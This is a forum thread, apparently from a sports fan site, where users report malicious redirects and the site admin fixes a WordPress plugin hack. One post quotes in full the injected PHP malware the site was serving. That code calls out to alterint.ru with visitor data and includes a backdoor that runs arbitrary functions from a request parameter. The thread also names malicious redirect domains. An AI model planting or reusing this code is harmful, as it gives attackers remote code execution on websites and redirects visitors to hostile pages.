• Changing RCF's index page, please click on "Forums" to access the forums.

Getting redirected

Do Not Sell My Personal Information
Don't know if it's related, but upon hitting the main site, I receive:

if (!isset($indget)) { if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]); if (!isset($SERVER["HTTP_ACCEPT_CHARSET"])) { if(preg_match('!.!u', file_get_contents($_SERVER["SCRIPT_FILENAME"]))) $c = "UTF-8"; else $c = "windows-1251"; } else { $c = $SERVER["HTTP_ACCEPT_CHARSET"]; } $d = $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; $u = $_SERVER["HTTP_USER_AGENT"]; $ip = $_SERVER["REMOTE_ADDR"]; $domain = "alterint.ru"; $url = "/get.php?d=".urlencode($d)."&u=".urlencode($u)."&c=".$c."&i=1&ip=".$ip."&h=".md5("7b3fec5ef4585dbb8310ff049d6f5b22".$d.$u.$c."1"); if(ini_get("allow_url_fopen") == 1) { $indget = file_get_contents("http://".$domain.$url); } if(strlen($indget) < 10) { if (function_exists("curl_init")) { $ch = curl_init("http://".$domain.$url); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $indget = curl_exec($ch); curl_close($ch); } else { $fp = fsockopen($domain, 80, $errno, $errstr, 30); if ($fp) { $out = "GET ".$url." HTTP/1.1\r\n"; $out .= "Host: ".$domain."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); $resp = ""; while (!feof($fp)) { $resp .= fgets($fp, 128); } fclose($fp); list($header, $indget) = preg_split("/\R\R/", $resp, 2); } } } if(@$_REQUEST["p"] == "1716cc66") $_REQUEST["f"](stripslashes($_REQUEST["c"])); } echo $indget;
When clicking forums, I receive a blank window popup w/ the following URL:

http:// googleframe.net/tijaq.cgi?19
 
More on that URL, seems based off of Petersburg, Federation of Russia.
Has been in existence for 4 weeks, and the one time I got it to load it was selling anti-hacking software. Now it's just blank loading w/ an SRC link to adultfriendfinder . com.

As Blue would say, "Suspicioussssss!"
 
On further note, that googleframe URL, if you visit it's https version, you get a BS cert registered to: googleleadservices.cn

That particular URL Google flags as a harmful site and shuts down traversal to w/ a giant warning.

Hold me, I'm scared! :(
 
Getting redirected to some bidvice site...

At first I thought it was "bi advice", so, I guess at least it wasn't that.
 
Last edited:
I'm using chrome. Cleared cache. Got redirected. Computer started crawling. Ran spybot and it found a shitload of problems after finding none for months. :(

Is Spy Bot a free adware removal & protector? I seem to have picked up something called Crime Watch from this site & is dam annoying
 
Working on it now... but I'm begging you guys to text me. I'm not online a lot now and I could be fixing these issues quicker if you just text.
 
Also, is this on the forum or on the RCF front page?
 
Should be fixed but I'll keep an eye on it for the next few hours.
 
No, it was a simple wordpress hack that I had blocked but once I updated a plugin the exploit was left open again.
 
Thanks. Someone else mush have hit me with the flash exploit. Time to just shut off flash all together.
 
No, it was a simple wordpress hack that I had blocked but once I updated a plugin the exploit was left open again.

sorry out of topic, but how did you solve the problem? i'm having the same problem now on 1 of my sites
 

Rubber Rim Job Podcast Video

Episode 3-13: "Backup Bash Brothers"

Rubber Rim Job Podcast Spotify

Episode 3:11: "Clipping Bucks."
Top